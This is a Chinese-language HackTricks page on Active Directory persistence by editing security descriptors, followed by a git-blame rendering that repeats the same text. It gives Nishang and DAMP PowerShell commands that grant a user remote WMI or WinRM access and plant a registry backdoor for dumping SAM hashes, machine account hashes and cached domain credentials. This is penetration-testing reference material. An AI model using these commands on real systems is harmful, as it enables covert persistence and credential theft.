hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md

# 安全描述符

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>

- 你在一家**网络安全公司**工作吗？你想在HackTricks中看到你的**公司广告**吗？或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！

- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)

- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)

- **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)，或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**

- **通过向[hacktricks仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud仓库](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>

## 安全描述符

安全描述符定义语言（SDDL）定义了用于描述安全描述符的格式。SDDL使用ACE字符串来表示DACL和SACL：`ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;`

**安全描述符**用于**存储**对象对**另一个对象**的**权限**。如果你可以**对对象的安全描述符**进行**小的更改**，你可以在不需要成为特权组成员的情况下获得对该对象的非常有趣的权限。

因此，这种持久化技术基于能够获得针对特定对象所需的每个权限，以便能够执行通常需要管理员权限的任务，但无需成为管理员。

### 访问WMI

你可以使用[**这个方法**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)为用户提供**远程执行WMI**的访问权限：
```bash
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
```
### 访问WinRM

为用户提供对**winrm PS控制台的访问权限**[**使用此链接**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**：**
```bash
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
```
### 远程访问哈希值

访问**注册表**并**转储哈希值**，使用[**DAMP**](https://github.com/HarmJ0y/DAMP)创建**Reg后门**，这样你可以随时检索计算机的哈希值、**SAM**和计算机中的任何**缓存的AD凭据**。因此，将此权限授予**普通用户对域控制器计算机**非常有用：
```bash
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
```
查看[**Silver Tickets**](silver-ticket.md)以了解如何使用域控制器的计算机帐户的哈希值。

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- 你在一家**网络安全公司**工作吗？想要在HackTricks中**宣传你的公司**吗？或者你想要**获取PEASS的最新版本或下载PDF格式的HackTricks**吗？请查看[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)！

- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)

- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)

- **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)，或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**

- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								# 安全描述符
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								- 你在一家**网络安全公司**工作吗？你想在HackTricks中看到你的**公司广告**吗？或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								- **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)，或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								- **通过向[hacktricks仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud仓库](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 安全描述符
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								安全描述符定义语言（SDDL）定义了用于描述安全描述符的格式。SDDL使用ACE字符串来表示DACL和SACL：`ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;`
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								**安全描述符**用于**存储**对象对**另一个对象**的**权限**。如果你可以**对对象的安全描述符**进行**小的更改**，你可以在不需要成为特权组成员的情况下获得对该对象的非常有趣的权限。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								因此，这种持久化技术基于能够获得针对特定对象所需的每个权限，以便能够执行通常需要管理员权限的任务，但无需成为管理员。
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### 访问WMI
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								你可以使用[**这个方法**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)为用户提供**远程执行WMI**的访问权限：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
 								Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
 								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### 访问WinRM
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								为用户提供对**winrm PS控制台的访问权限**[**使用此链接**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**：**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
 								Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
 								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### 远程访问哈希值
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								访问**注册表**并**转储哈希值**，使用[**DAMP**](https://github.com/HarmJ0y/DAMP)创建**Reg后门**，这样你可以随时检索计算机的哈希值、**SAM**和计算机中的任何**缓存的AD凭据**。因此，将此权限授予**普通用户对域控制器计算机**非常有用：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
+								# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
 								# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
 								# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
 								# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
 								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								查看[**Silver Tickets**](silver-ticket.md)以了解如何使用域控制器的计算机帐户的哈希值。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												update twitter

											
										
										
											2023-04-25 18:35:28 +00:00
+								<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								- 你在一家**网络安全公司**工作吗？想要在HackTricks中**宣传你的公司**吗？或者你想要**获取PEASS的最新版本或下载PDF格式的HackTricks**吗？请查看[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)！
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								- **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)，或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>